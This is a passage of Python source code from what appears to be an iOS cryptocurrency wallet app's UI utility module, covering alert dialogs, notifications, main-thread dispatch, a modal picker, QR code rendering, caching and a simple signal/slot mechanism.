def ActivityCompletion(s : objc_id, completed : bool, arr : objc_id, err : objc_id) -> None:
activity = py_from_ns(ObjCInstance(s)) if completed else None
def DoUserCompl() -> None:
if callable(finishedCompletion):
finishedCompletion(activity)
print('activity =',activity)
if err and err.value:
err = ObjCInstance(err)
show_alert(vc = vc, title = "Error", message = str(err), actions = [ [_('OK'), DoUserCompl] ])
else:
DoUserCompl()
if activity is None: return
if activity in (py_from_ns(UIActivityTypeCopyToPasteboard)):
show_notification(message = _("{} copied to clipboard").format(objectName))
elif activity in ('com.apple.CloudDocsUI.AddToiCloudDrive', py_from_ns(UIActivityTypeAirDrop)):
show_notification(message = _("{} saved successfully").format(objectName))
elif activity in (py_from_ns(UIActivityTypeMessage),py_from_ns(UIActivityTypeMail)):
show_notification(message = _("{} sent successfully").format(objectName))
elif activity in (py_from_ns(UIActivityTypePrint)):
show_notification(message = _("{} sent to printer").format(objectName))
elif activity in (py_from_ns(UIActivityTypeSaveToCameraRoll)):
show_notification(message = _("{} saved to photo library").format(objectName))
else:
show_notification(message = _("{} exported successfully").format(objectName))
avc.completionWithItemsHandler = Block(ActivityCompletion)
vc.presentViewController_animated_completion_(avc,animated,onCompletion)
return avc
###################################################
### Show modal alert
###################################################
def show_please_wait(vc : ObjCInstance, message : str, animated : bool = True, completion : Callable[[],None] = None) -> ObjCInstance:
pw = None
try:
objs = NSBundle.mainBundle.loadNibNamed_owner_options_("PleaseWait", None, None)
for o in objs:
if isinstance(o, PleaseWaitVC):
pw = o
break
except:
NSLog("Could not load PleaseWait.nib:",sys.exc_info()[1])
if not pw:
return show_alert(vc, title = _("Please wait"), message = message, actions = [], animated = animated, completion = completion)
pw.message.text = message
vc.presentViewController_animated_completion_(pw, animated, completion)
return pw
def show_alert(vc : ObjCInstance, # the viewcontroller to present the alert view in
title : str, # the alert title
message : str, # the alert message
# actions is a list of lists: each element has: Button names, plus optional callback spec
# each element of list is [ 'ActionTitle', callable, arg1, arg2... ] for optional callbacks
actions: list = [ ['Ok'] ], # default has no callbacks and shows Ok button
cancel: str = None, # name of the button you want to designate as 'Cancel' (ends up being first)
destructive: str = None, # name of the button you want to designate as destructive (ends up being red)
style: int = UIAlertControllerStyleAlert, #or: UIAlertControllerStyleActionSheet
completion: Callable[[],None] = None, # optional completion function that gets called when alert is presented
animated: bool = True, # whether or not to animate the alert
localRunLoop: bool = False, # whether or not to create a local event loop and block until dialog finishes.. useful for full stop error messages and/or password dialogs
uiTextFieldHandlers : list = None, # if you want to create custom UITextFields in this alert, and the alert'ss type is UIAlertControllerStyleAlert, pass a list of fully annotated callbacks taking an objc_id as arg and returning None, one for each desired text fields you want to create
ipadAnchor : object = None # A CGRect -- use this on ipad to specify an anchor if using UIAlertControllerStyleActionSheet
) -> ObjCInstance:
if localRunLoop:
NSLog("\n***\n*** WARNING -- 'localRunLoop' on modal dialogs is pretty buggy, as it turns out. Please fix the calling code to not use it!\n***")
if not NSThread.currentThread.isMainThread:
raise Exception('utils.show_alert can only be called from the main thread!')
alert = UIAlertController.alertControllerWithTitle_message_preferredStyle_(title, message, style)
if uiTextFieldHandlers:
if style != UIAlertControllerStyleAlert:
raise ValueError('Cannot combine uiTextFieldHandlers with non-UIAlertControllerStyleAlert alerts!')
for h in uiTextFieldHandlers:
alert.addTextFieldWithConfigurationHandler_(Block(h)) # let's hope h is a callable of the right type with the right number of args else exception will be thrown here
if type(actions) is dict:
acts = []
for k in actions.keys():
if actions[k] is not None:
acts.append([k,*actions[k]])
else:
acts.appens([k])
actions = acts
ct=0
fun_args_dict = dict()
got_callback = False
for i,arr in enumerate(actions):
has_callable = False
fun_args = []
if type(arr) is list or type(arr) is tuple:
actTit = arr[0]
fun_args = arr[1:]
has_callable = True
else:
actTit = arr
style = UIAlertActionStyleCancel if actTit == cancel else UIAlertActionStyleDefault
style = UIAlertActionStyleDestructive if actTit == destructive else style
def onAction(act_in : objc_id) -> None:
act = ObjCInstance(act_in)
fargs = fun_args_dict.get(act.ptr.value,[])
nonlocal got_callback
got_callback = True
if len(fargs):
#print("Calling action...")
fargs[0](*fargs[1:])
act = UIAlertAction.actionWithTitle_style_handler_(actTit,style,onAction)
fun_args_dict[act.ptr.value] = fun_args
alert.addAction_(act)
ct+=1
def onCompletion() -> None:
#print("On completion called..")
nonlocal got_callback, alert
if not actions: got_callback = True
if completion is not None:
#print("Calling completion callback..")
sig = signature(completion)
if len(sig.parameters) > 0:
completion(alert.ptr)
else:
completion()
if is_ipad() and alert.preferredStyle == UIAlertControllerStyleActionSheet:
popover = alert.popoverPresentationController()
if isinstance(ipadAnchor, UIBarButtonItem):
popover.barButtonItem = ipadAnchor
else:
popover.sourceView = vc.view
if isinstance(ipadAnchor, CGRect):
rect = ipadAnchor
else:
rect = vc.view.frame
rect = CGRectMake(rect.size.width/2.0,rect.size.height/4.0,0.0,0.0)
popover.sourceRect = rect
vc.presentViewController_animated_completion_(alert,animated,onCompletion)
if localRunLoop:
while not got_callback:
NSRunLoop.currentRunLoop().runUntilDate_(NSDate.dateWithTimeIntervalSinceNow_(0.1))
return None
return alert
# Useful for doing a "Please wait..." style screen that takes itself offscreen automatically after a delay
# (may end up using this for some info alerts.. not sure yet)
def show_timed_alert(vc : ObjCInstance, title : str, message : str,
timeout : float, style : int = UIAlertControllerStyleAlert, animated : bool = True) -> ObjCInstance:
assert NSThread.currentThread.isMainThread
alert = None
def completionFunc() -> None:
def dismisser() -> None:
vc.dismissViewControllerAnimated_completion_(animated,None)
call_later(timeout, dismisser)
alert=show_alert(vc=vc, title=title, message=message, actions=[], style=style, completion=completionFunc)
return alert
# Useful for showing an alert with a single UITextField for user input of data
def show_tf_alert(vc : ObjCInstance, title : str, message : str,
completion : Callable[[],None] = None, placeholder : str = "Tap to input", text : str = "",
adjustsFontSizeToFitWidth = True, minimumFontSize = 9.0, clearButtonAlwaysVisible = True,
onOk : Callable[[],str] = None, onCancel : Callable[[],None] = None, animated : bool = True,
secureTextEntry = False, autocapitalizationType = UITextAutocapitalizationTypeNone,
autocorrectionType = UITextAutocorrectionTypeNo, spellCheckingType = UITextSpellCheckingTypeNo) -> ObjCInstance:
tf = None
def SetupTF(tfo : objc_id) -> None:
nonlocal tf
tf = ObjCInstance(tfo).retain() # need to retain it because it will get released when dialog goes away, but we want its data in MyOnOk below..
tf.placeholder = placeholder if placeholder else ''
tf.adjustsFontSizeToFitWidth = adjustsFontSizeToFitWidth
tf.minimumFontSize = minimumFontSize
tf.clearButtonMode = UITextFieldViewModeAlways if clearButtonAlwaysVisible else UITextFieldViewModeWhileEditing
tf.secureTextEntry = secureTextEntry
tf.autocapitalizationType = autocapitalizationType
tf.autocorrectionType = autocorrectionType
tf.spellCheckingType = spellCheckingType
tf.text = text if text else ''
def MyOnCancel() -> None:
nonlocal tf
tf.release()
tf = None
if callable(onCancel):
onCancel()
def MyOnOk() -> None:
nonlocal tf
userInput = tf.text
tf.release()
tf = None
if callable(onOk):
onOk(userInput)
return show_alert(vc = vc, title = title, message = message, completion = completion, cancel = _('Cancel'), animated = animated,
uiTextFieldHandlers = [ SetupTF ], actions = [ [ _('OK'), MyOnOk ], [ _('Cancel'), MyOnCancel ] ])
###################################################
### Calling callables later or from the main thread
###################################################
def do_in_main_thread(func : Callable, *args) -> Any:
if NSThread.currentThread.isMainThread:
return func(*args)
else:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, False)
return None
def do_in_main_thread_sync(func : Callable, *args) -> Any:
if NSThread.currentThread.isMainThread:
return func(*args)
else:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, True)
return None
def do_in_main_thread_async(func : Callable, *args) -> None:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, False)
def call_later(timeout : float, func : Callable, *args) -> ObjCInstance:
timer = None
if not NSThread.currentThread.isMainThread:
# NB: From NSRunLoop docs -- messing with the run loop from another thread is bad bad bad since NSRunLoop is not thread safe
# so we force this scheduling of the NSTiemr to happen on the main thread... using dispatch_queue tricks in HelpfulGlue.
#NSLog("****** WARNING WARNING WARNING -- utils.call_later() called from outside the main thread! FIXME!!!! ******")
def inMain() -> None:
nonlocal timer
timer = call_later(timeout, func, *args)
HelpfulGlue.performBlockInMainThread_sync_(inMain, True)
else:
def OnTimer(t_in : objc_id) -> None:
t = ObjCInstance(t_in)
func(*args)
if t: t.invalidate()
timer = NSTimer.timerWithTimeInterval_repeats_block_(timeout, False, OnTimer)
NSRunLoop.mainRunLoop().addTimer_forMode_(timer, NSDefaultRunLoopMode)
return timer
###
### Modal picker stuff
###
class UTILSModalPickerHelper(UIViewController):
''' This class has this funny name because in the obj-c space, all class names are in the global namespace
and as this class really is a private class to utils.py, we name it using the UTILS prefix to keep things
isolated. '''
items = objc_property()
lastSelection = objc_property()
needsDismiss = objc_property()
@objc_method
def init(self) -> ObjCInstance:
self = ObjCInstance(send_super(__class__, self,'init'))
if self:
self.items = None
self.lastSelection = 0
self.needsDismiss = False
self.modalPresentationStyle = UIModalPresentationOverFullScreen
return self
@objc_method
def dealloc(self) -> None:
self.finished()
remove_all_callbacks(self)
self.needsDismiss = None
# print("UTILSModalPickerHelper dealloc")
send_super(__class__, self, 'dealloc')
@objc_method
def numberOfComponentsInPickerView_(self, p : ObjCInstance) -> int:
return 1
@objc_method
def pickerView_numberOfRowsInComponent_(self, p : ObjCInstance, component : int) -> int:
assert component == 0
return len(self.items)
@objc_method
def pickerView_didSelectRow_inComponent_(self, p : ObjCInstance, row : int, component : int) -> None:
assert component == 0 and row < len(self.items)
self.lastSelection = row
@objc_method
def pickerView_titleForRow_forComponent_(self, p : ObjCInstance, row : int, component : int) -> ObjCInstance:
txt = ''
if component == 0 and row < len(self.items): txt = self.items[row]
return txt
@objc_method
def onOk_(self, but : ObjCInstance) -> None:
# print ("Ok pushed")
cb = get_callback(self, 'onOk')
if callable(cb):
sig = signature(cb)
params = sig.parameters
if len(params) > 0:
cb(int(self.lastSelection if self.lastSelection else 0))
else:
cb()
self.finished()
@objc_method
def onCancel_(self, but : ObjCInstance) -> None:
# print ("Cancel pushed")
self.finished()
@objc_method
def finished(self) -> None:
if self.viewIfLoaded and self.needsDismiss:
self.dismissViewControllerAnimated_completion_(True, None)
self.items = None
self.lastSelection = None
self.needsDismiss = False
###################################################
### Modal picker
###################################################
def present_modal_picker(parentVC : ObjCInstance,
items : list,
selectedIndex : int = 0,
okCallback : Callable[[int],None] = None,
okButtonTitle : str = "OK",
cancelButtonTitle : str = "Cancel") -> ObjCInstance:
assert parentVC is not None and items is not None and len(items)
helper = UTILSModalPickerHelper.new().autorelease()
objs = NSBundle.mainBundle.loadNibNamed_owner_options_("ModalPickerView",helper,None)
if not objs: raise Exception("Could not load ModalPickerView nib!")
mpv = helper.view # auto-attached by NIB loader above because connection was made in NIB to file's owner.view
p = mpv.viewWithTag_(200) # note UIPickerView p is auto-connected to helper as dataSource and delegate by NIB
okBut = mpv.viewWithTag_(1)
cancelBut = mpv.viewWithTag_(2)
cancelBut.layer.borderColor = uicolor_custom('nav').CGColor
helper.items = items
if okButtonTitle is not None: okBut.setTitle_forState_(okButtonTitle, UIControlStateNormal)
if cancelButtonTitle is not None: cancelBut.setTitle_forState_(cancelButtonTitle, UIControlStateNormal)
if okBut and cancelBut:
okBut.addTarget_action_forControlEvents_(helper, SEL(b'onOk:'), UIControlEventPrimaryActionTriggered)
cancelBut.addTarget_action_forControlEvents_(helper, SEL(b'onCancel:'), UIControlEventPrimaryActionTriggered)
else:
raise Exception('Picker NIB loaded but could not find the OK or Cancel button views! FIXME!')
if callable(okCallback): add_callback(helper, 'onOk', okCallback)
if selectedIndex > 0 and selectedIndex < len(items):
p.selectRow_inComponent_animated_(selectedIndex, 0, False)
helper.lastSelection = selectedIndex
parentVC.view.endEditing_(True) # NB: do not use setDisablesAutomaticKeyboardDismissal because it is missing on newer iOS! (caused an app crash) -- so we do this instead
parentVC.presentViewController_animated_completion_(helper, True, None)
helper.needsDismiss = True
return helper
###################################################
### Banner (status bar) notifications
###################################################
def show_notification(message : str,
duration : float = 2.0, # the duration is in seconds may be None but in that case must specify a completion
color : tuple = None, # color needs to have r,g,b,a components -- length 4, or be a UIColor
textColor : tuple = None, # color needs to have r,g,b,a components or be a UIColor
font : ObjCInstance = None,
style : int = CWNotificationStyleStatusBarNotification,
animationStyle : int = CWNotificationAnimationStyleTop,
animationType : int = CWNotificationAnimationTypeReplace,
animationDuration : float = 0.25, # the amount of time to animate in and out the notif
onTapCallback : Callable[[],None] = None, # the function to call if user taps notification -- should return None and take no args
multiline : bool = False,
noTapDismiss : bool = False,
completion : callable = None, # if you want to use the completion handler, set duration to None
) -> ObjCInstance:
cw_notif = CWStatusBarNotification.new().autorelease()
def onTap() -> None:
#print("onTap")
if onTapCallback is not None: onTapCallback()
if not cw_notif.notificationIsDismissing and not noTapDismiss:
cw_notif.dismissNotification()
if isinstance(color, UIColor):
pass
elif color is None or not isinstance(color, (tuple, list)) or len(color) != 4 or [c for c in color if type(c) not in [float,int] ]:
color = uicolor_custom('notif')
else:
color = UIColor.colorWithRed_green_blue_alpha_(*color)
if isinstance(textColor, UIColor):
pass
elif textColor is None or not isinstance(textColor, (tuple, list)) or len(textColor) != 4 or [c for c in textColor if type(c) not in [float,int] ]:
textColor = uicolor_custom('dark')
else:
textColor = UIColor.colorWithRed_green_blue_alpha_(*textColor)
if not isinstance(font, UIFont):
font = UIFont.systemFontOfSize_weight_(12, UIFontWeightMedium)
# set default blue color (since iOS 7.1, default window tintColor is black)
cw_notif.notificationLabelBackgroundColor = color
cw_notif.notificationLabelTextColor = textColor
cw_notif.notificationLabelFont = font
cw_notif.notificationStyle = style
cw_notif.notificationAnimationInStyle = animationStyle
cw_notif.notificationAnimationOutStyle = animationStyle
cw_notif.notificationAnimationType = animationType
cw_notif.notificationAnimationDuration = animationDuration
cw_notif.multiline = multiline
message = str(message)
duration = float(duration) if duration is not None else None
cw_notif.notificationTappedBlock = onTap
if duration is None and completion is not None:
cw_notif.displayNotificationWithMessage_completion_(message, Block(completion))
else:
if duration is None: duration = 2.0
cw_notif.displayNotificationWithMessage_forDuration_(message, duration)
return cw_notif
def dismiss_notification(cw_notif : ObjCInstance) -> None:
if cw_notif is not None and not cw_notif.notificationIsDismissing:
cw_notif.dismissNotification()
#######################################################
### NSLog emulation -- python wrapper for NSLog
#######################################################
def NSLog(fmt : str, *args) -> int:
args = list(args)
if isinstance(fmt, ObjCInstance):
fmt = str(py_from_ns(fmt))
fmt = fmt.replace("%@","%s")
for i,a in enumerate(args):
if isinstance(a, ObjCInstance):
try:
args[i] = str(a.description)
except Exception as e0:
#print("Exception on description call: %s"%str(e0))
try:
args[i] = str(py_from_ns(a))
except Exception as e:
print("Cannot convert NSLog argument %d to str: %s"%(i+1,str(e)))
args[i] = "<Unknown>"
try:
formatted = ns_from_py("{}".format(fmt%tuple(args)))
# NB: we had problems with ctypes and variadic functions due to ARM64 ABI weirdness. So we do this.
HelpfulGlue.NSLogString_(formatted)
except Exception as e:
print("<NSLog Emul Exception> : %s"%(str(e)))
formatted = "[NSLog Unavailable] {}".format(fmt%tuple(args))
print(formatted)
####################################################################
# NS Object Cache
#
# Store frequently used objc instances in a semi-intelligent, auto-
# retaining dictionary, complete with automatic low-memory-warning
# detection.
####################################################################
class NSObjCache:
def __init__(self, maxSize : int = 4, name : str = "Unnamed"):
self._cache = dict()
maxSize = 4 if type(maxSize) not in [float, int] or maxSize < 1 else int(maxSize) # C-programmer paranoia. ;)
self._max = maxSize
self._name = name
self._last = None
def lowMemory(notificaton : ObjCInstance) -> None:
# low memory warning -- loop through cache and release all cached images
ct = 0
for k in self._cache.keys():
self._cache[k].release()
ct += 1
self._cache = dict()
self._last = None
if ct: NSLog("Low Memory: Flushed %d objects from '%s' NSObjCache."%(ct,self._name))
self._token = NSNotificationCenter.defaultCenter.addObserverForName_object_queue_usingBlock_(
UIApplicationDidReceiveMemoryWarningNotification,
UIApplication.sharedApplication,
None,
lowMemory
).retain()
def __del__(self):
while len(self): self.release1()
if self._token is not None:
NSNotificationCenter.defaultCenter.removeObserver_(self._token.autorelease())
self._token = None
def release1(self):
keez = list(self._cache.keys())
while len(keez): # this normally only iterates once
k = keez[random.randrange(len(keez))]
if len(keez) > 1 and k is not None and self._last is not None and k == self._last:
# never expire the 'latest' item from the cache, unless the cache is of size 1
continue
self._cache.pop(k).release()
if k == self._last: self._last = None
break # end after 1 successful iteration
def put(self, key, obj : ObjCInstance):
if self._cache.get(key,None) is not None: return
while len(self) >= self._max:
self.release1()
#print("NSObjCache %s expired an object from full cache"%(self._name))
self._cache[key] = obj.retain()
#print("Cache %s size now %d"%(self._name,len(self)))
def get(self, key) -> ObjCInstance: # returns None on cache miss
ret = self._cache.get(key, None)
#if ret is not None: print("NSObjCache %s hit"%(self._name))
#else: print("NSObjCache %s miss"%(self._name))
self._last = key
return ret
def __len__(self):
return len(self._cache)
#############################
# Shows a QRCode
#############################
_qr_cache = NSObjCache(10,"QR UIImage Cache")
def present_qrcode_vc_for_data(vc : ObjCInstance, data : str, title : str = "QR Code") -> ObjCInstance:
uiimage = get_qrcode_image_for_data(data)
qvc = UIViewController.new().autorelease()
qvc.title = title
iv = UIImageView.alloc().initWithImage_(uiimage).autorelease()
iv.autoresizeMask = UIViewAutoresizingFlexibleWidth|UIViewAutoresizingFlexibleHeight|UIViewAutoresizingFlexibleLeftMargin|UIViewAutoresizingFlexibleRightMargin|UIViewAutoresizingFlexibleTopMargin|UIViewAutoresizingFlexibleBottomMargin
iv.contentMode = UIViewContentModeScaleAspectFit
iv.opaque = True
iv.backgroundColor = UIColor.whiteColor
gr = UITapGestureRecognizer.new().autorelease()
iv.addGestureRecognizer_(gr)
def ActionBlock(gr : objc_id) -> None:
def ShowIt() -> None: show_share_actions(vc = qvc, img = iv.image, ipadAnchor = iv.frame, objectName = _("Image"))
c1 = UIColor.whiteColor
c2 = UIColor.colorWithRed_green_blue_alpha_(0.0,0.0,0.0,0.3)
iv.backgroundColorAnimationFromColor_toColor_duration_reverses_completion_(c1, c2, 0.2, True, ShowIt)
gr.addBlock_(ActionBlock)
iv.userInteractionEnabled = True
qvc.view = iv
nav = tintify(UINavigationController.alloc().initWithRootViewController_(qvc).autorelease())
vc.presentViewController_animated_completion_(nav,True,None)
return qvc
def get_qrcode_image_for_data(data : str, size : CGSize = None) -> ObjCInstance:
global _qr_cache
if not isinstance(data, (str, bytes)):
raise TypeError('argument to get_qrcode_for_data should be of type str or bytes!')
if isinstance(data, bytes): data = data.decode('utf-8')
uiimage = None
if not size: size = CGSizeMake(256.0,256.0)
key = "(%0.2f,%0.2f)[%s]"%(size.width,size.height,data)
uiimage = _qr_cache.get(key)
if uiimage is None:
#print("**** CACHE MISS for",key)
qr = qrcode.QRCode(image_factory=qrcode.image.svg.SvgPathFillImage)
qr.add_data(data)
img = qr.make_image()
fname = ""
tmp, fname = tempfile.mkstemp()
img.save(fname)
os.close(tmp)
with open(fname, 'r') as tmp_file:
contents = tmp_file.read()
os.remove(fname)
uiimage = UIImage.imageWithSVGString_targetSize_fillColor_cachedName_(
contents,
size,
UIColor.blackColor,
None
)
_qr_cache.put(key, uiimage)
#else:
# print("**** CACHE HIT for",key)
return uiimage
#########################################################################################
# Poor man's signal/slot support
# For our limited ObjC objects which can't have Python attributes
#########################################################################################
_cb_map = dict()
def add_callback(obj : ObjCInstance, name : str, callback : Callable) -> None:
global _cb_map
if name is None: raise ValueError("add_callback: name parameter must be not None")
if callable(callback):
m = _cb_map.get(obj.ptr.value, dict())
m[name] = callback
_cb_map[obj.ptr.value] = m
else:
remove_callback(obj, name)
def remove_all_callbacks(obj : ObjCInstance) -> None:
global _cb_map
_cb_map.pop(obj.ptr.value, None)
def remove_callback(obj : ObjCInstance, name : str) -> None:
global _cb_map
if name is not None:
m = _cb_map.get(obj.ptr.value, None)
if m is None: return
m.pop(name, None)
if len(m) <= 0:
_cb_map.pop(obj.ptr.value, None)
else:
_cb_map[obj.ptr.value] = m
else:
remove_all_callbacks(obj)
def get_callback(obj : ObjCInstance, name : str) -> Callable:
global _cb_map
def dummyCB(*args) -> None:
pass
if name is None: raise ValueError("get_callback: name parameter must be not None")
return _cb_map.get(obj.ptr.value, dict()).get(name, dummyCB)
#########################################################
# TaskThread Stuff
# -- execute a python task in a separate (Python) Thread
#########################################################
class TaskThread:
'''Thread that runs background tasks. Callbacks are guaranteed
to happen in the main thread.'''
Task = namedtuple("Task", "task cb_success cb_done cb_error")
def __init__(self, on_error=None):
self.on_error = on_error
self.tasks = queue.Queue()
self.worker = threading.Thread(target=self.run, name="TaskThread worker", daemon=True)
self.start()
def __del__(self):
#NSLog("TaskThread __del__")
if self.worker:
if self.worker.is_alive():
NSLog("TaskThread worker was running, force cancel...")
self.stop()
#self.wait()
self.worker = None
def start(self):
if self.worker and not self.worker.is_alive():
self.worker.start()
return True
elif not self.worker:
raise ValueError("The Thread worker was None!")
def add(self, task, on_success=None, on_done=None, on_error=None):
on_error = on_error or self.on_error
self.tasks.put(TaskThread.Task(task, on_success, on_done, on_error))
def run(self):
while True:
task = self.tasks.get()
if not task:
break
try:
result = task.task()
do_in_main_thread(self.on_done, result, task.cb_done, task.cb_success)
except:
do_in_main_thread(self.on_done, sys.exc_info(), task.cb_done, task.cb_error)
NSLog("Exiting TaskThread worker thread...")
def on_done(self, result, cb_done, cb):
# This runs in the main thread.
if cb_done:
cb_done()
if cb:
cb(result)
def stop(self):
if self.worker and self.worker.is_alive():
self.tasks.put(None)
def wait(self):
if self.worker and self.worker.is_alive():
self.worker.join()
self.worker = None
@staticmethod
def test():
def onError(result):
NSLog("onError called, result=%s",str(result))
tt = TaskThread(onError)
def onDone():
nonlocal tt
NSLog("onDone called")
tt.stop()
tt.wait()
NSLog("test TaskThread joined ... returning.. hopefully cleanup will happen")
tt = None # cleanup?
def onSuccess(result):
NSLog("onSuccess called, result=%s",str(result))
def task():
NSLog("In task thread.. sleeping once every second for 10 seconds")
for i in range(0,10):
NSLog("Iter: %d",i)
time.sleep(0.2)
return "Yay!"
tt.add(task, onSuccess, onDone, onError)
class WaitingDialog:
'''Shows a please wait dialog whilst runnning a task. It is not
necessary to maintain a reference to this dialog.'''
def __init__(self, vc, message, task, on_success=None, on_error=None):
assert vc
self.vc = vc
self.thread = TaskThread()
def onPresented() -> None:
self.thread.add(task, on_success, self.dismisser, on_error)
#title = _("Please wait")
#self.alert=show_alert(vc = self.vc, title = title, message = message, actions=[], completion=onPresented)
self.alert = show_please_wait(vc = self.vc, message = message, completion=onPresented)
def __del__(self):
#print("WaitingDialog __del__")
pass
def wait(self):
self.thread.wait()
def on_finished(self) -> None:
self.thread.stop()
self.wait()
self.alert = None
self.thread = None
def dismisser(self) -> None:
def compl() -> None:
self.on_finished()
self.vc.dismissViewControllerAnimated_completion_(True, compl)
###
# NS -> py cache since our obj-c objects can't store python attributes :/
###
_nspy_dict = dict()
def nspy_get(ns : ObjCInstance) -> Any:
global _nspy_dict
return _nspy_dict.get(ns.ptr.value,None)
def nspy_put(ns : ObjCInstance, py : Any) -> None:
global _nspy_dict
_nspy_dict[ns.ptr.value] = py
def nspy_pop(ns : ObjCInstance) -> Any:
global _nspy_dict
return _nspy_dict.pop(ns.ptr.value,None)
def nspy_get_byname(ns : ObjCInstance, name : str) -> Any:
m = nspy_get(ns)
ret = None
if isinstance(m, dict):
ret = m.get(name,None)
return ret
def nspy_put_byname(ns : ObjCInstance, py : Any, name : str) -> None:
m = nspy_get(ns)
needPutBack = False
if m is None:
m = dict()
needPutBack = True
if isinstance(m, dict):
m[name] = py
if needPutBack: nspy_put(ns, m)
def nspy_pop_byname(ns : ObjCInstance, name : str) -> Any:
m = nspy_get(ns)
ret = None
if m and isinstance(m, dict):
ret = m.pop(name,None)
if not m: nspy_pop(ns) # clean up when dict is empty
return ret
####################################################################
# Another take on signals/slots -- Python-only signal/slot mechanism
####################################################################
class PySig:
Entry = namedtuple('Entry', 'func key is_ns')
def __init__(self):
self.clear()
def clear(self) -> None:
try:
del self.entries
except AttributeError:
pass
self.entries = list() # list of slots
def connect(self, func : Callable, key : Any = None) -> None:
''' Note: the func arg, for now, needs to take explicit args and no *args, **kwags business as it's not yet supported.'''
if not callable(func):
raise ValueError("Passed-in arg to PySig connect is not a callable!")
is_ns = False
if isinstance(key, ObjCInstance):
is_ns = True
key = key.ptr.value
entry = PySig.Entry(func, key, is_ns)
self.entries.append(entry)
def disconnect(self, func_or_key : Any = None) -> None:
if func_or_key is None:
self.clear()
return
func = None
key = None
removeAll = False
if callable(func_or_key):
func = func_or_key
else:
key = func_or_key
if isinstance(key, ObjCInstance):
key = key.ptr.value
removeAll = True
removeCt = 0
for i,entry in enumerate(self.entries):
if (key is not None and key == entry.key) or (func is not None and func == entry.func):
self.entries.pop(i)
removeCt += 1
if not removeAll: return
if removeCt: return
name = "<Unknown NSObject>"
try:
name = str(func_or_key)
except:
print(str(sys.exc_info()[1]))
finally:
NSLog("PySig disconnect: *** WARNING -- could not find '%s' in list of connections!",name)
def emit_common(self, require_sync : bool, *args) -> None:
def doIt(entry, wasMainThread, *args) -> None:
try:
if not wasMainThread and (not self.entries or entry not in self.entries):
# entry was removed from underneath us before callback ran!
pass
else:
sig = signature(entry.func)
# call slot...
entry.func(*args[:len(sig.parameters)])
finally:
#if not wasMainThread and entry.is_ns:
# release iff NSObject..
# ObjCInstance(objc_id(entry.key)).release()
# NSLog(" *** NSObject release")
pass
isMainThread = bool(NSThread.currentThread.isMainThread)
# guard against slots requesting themselves to be removed while this loop is iterating
entries = self.entries.copy()
#if not isMainThread: # first, run through all entries that may be NSObjects and retain them
#for entry in entries:
# if it's an NSObject, retain it then release it in the embedded callback
#if entry.is_ns:
# NSLog(" *** NSObject retain")
# ObjCInstance(objc_id(entry.key)).retain()
# next, call the slots in the main thread, optionally releasing any nsobject retained above
for entry in entries:
if isMainThread:
doIt(entry, isMainThread, *args)
elif require_sync:
do_in_main_thread_sync(doIt, entry, isMainThread, *args)
else:
do_in_main_thread(doIt, entry, isMainThread, *args)
def emit(self, *args) -> None:
self.emit_common(False, *args)
def emit_sync(self, *args) -> None:
self.emit_common(True, *args)
class MyNSObs(NSObject):
@objc_method
def dealloc(self) -> None:
#print("MyNSObs dealloc")
sig = nspy_pop(self)
if sig is not None:
#print("MyNSObs -- sig was found...")
sig.emit(sig.ptr)
sig.observer = None
else:
print("MyNSObs -- sig was None!")
send_super(__class__,self,'dealloc')
class NSDeallocObserver(PySig):
''' Provides the ability to observe the destruction of an objective-c object instance, and be notified of said
object's destruction on the main thread via our Qt-like 'signal' mechanism. For an example of this class's usefulness,
see the 'register_keyboard_callbacks' function later in this file.
Note that it is not necessary to keep a reference to this object around as it automatically gets associated with
internal data structures and auto-removes itself once the signal is emitted. The signal itself has 1 param, the objc_id
of the watched object. The watched object may or may not still be alive when the signal is emitted, however.'''
def __init__(self, ns : ObjCInstance, observer_class : MyNSObs = None):
if not isinstance(ns, (ObjCInstance, objc_id)):
raise ValueError("Argument for NSDeallocObserver must be an ObjCInstance or objc_id")
super().__init__()
self.ptr = ns.ptr if isinstance(ns, ObjCInstance) else ns
import rubicon.objc.runtime as rt
if observer_class is None: observer_class = MyNSObs
self.observer = observer_class.new().autorelease()
rt.libobjc.objc_setAssociatedObject(self.ptr, self.observer.ptr, self.observer.ptr, 0x301)
nspy_put(self.observer, self) # our NSObject keeps a strong reference to us
def dissociate(self) -> None:
self.disconnect()
import rubicon.objc.runtime as rt
rt.libobjc.objc_setAssociatedObject(self.ptr, self.observer.ptr, objc_id(0), 0x301)
'''
# This is here for debugging purposes.. Commented out as __del__ is dangerous if it has external dependencies
def __del__(self):
#print ("NSDeallocObserver __del__")
if self.observer:
print("NSDeallocObserver __del__: self.observer was not nil!")
nspy_pop(self.observer)
#super().__del__()
'''
def set_namedtuple_field(nt : object, fieldname : str, newval : Any) -> object:
try:
d = nt._asdict()
except:
raise ValueError('set_namedtuple_field, first argument does not appear to be a valid namedtuple!')
if not isinstance(fieldname, str):
raise ValueError('set_namedtuple_field, fieldname (second arg) must be a string!')
if fieldname not in d:
raise ValueError('%s is not a field in namedtuple %s'%(str(fieldname),type(nt).__qualname__))
else:
d[fieldname] = newval
return type(nt)(**d)
#########################################################################################################
# Data Manager -- domain based data cache -- uses this app's PySig mechanism to announce interested #
# subsystems about data updates. Used by tx history (and other app mechanisms). Instances live in #
# the gui.ElectrumGui instance. .emit() implicitly empties the cache. emptyCache() implicitly emits. #
#########################################################################################################
class DataMgr(PySig):
def __init__(self):
super().__init__()
#self.clear() # super calls clear, which calls this instance method, which itself calls super().clear().. python inheritence is weird
def clear(self):
super().clear()
self.datas = dict()
def keyify(self, key: Any) -> Any:
if isinstance(key, (list,tuple,dict,set)):
key = str(key)
return key
def get(self, realkey : Any) -> Any:
key = self.keyify(realkey)
if key not in self.datas:
#print("DataMgr: cache miss for domain (%s), calling doReload"%(str(key)))
self.datas[key] = self.doReloadForKey(realkey)
else:
pass
#print("DataMgr: cache HIT for domain (%s)"%(str(key)))
return self.datas.get(key, None)
def emptyCache(self, noEmit : bool = False, require_sync : bool = False, *args) -> None:
self.datas = dict()
if not noEmit:
super().emit_common(require_sync = require_sync, *args)
def emit_common(self, require_sync : bool, *args) -> None:
self.emptyCache(noEmit = False, require_sync = require_sync, *args)
def doReloadForKey(self, key : Any) -> Any:
NSLog("DataMgr: UNIMPLEMENTED -- doReloadForKey() needs to be overridden in a child class!")
return None
######
### Various helpers for laying out text, building attributed strings, etc...
######
_f1 = UIFont.systemFontOfSize_weight_(16.0,UIFontWeightBold).retain()
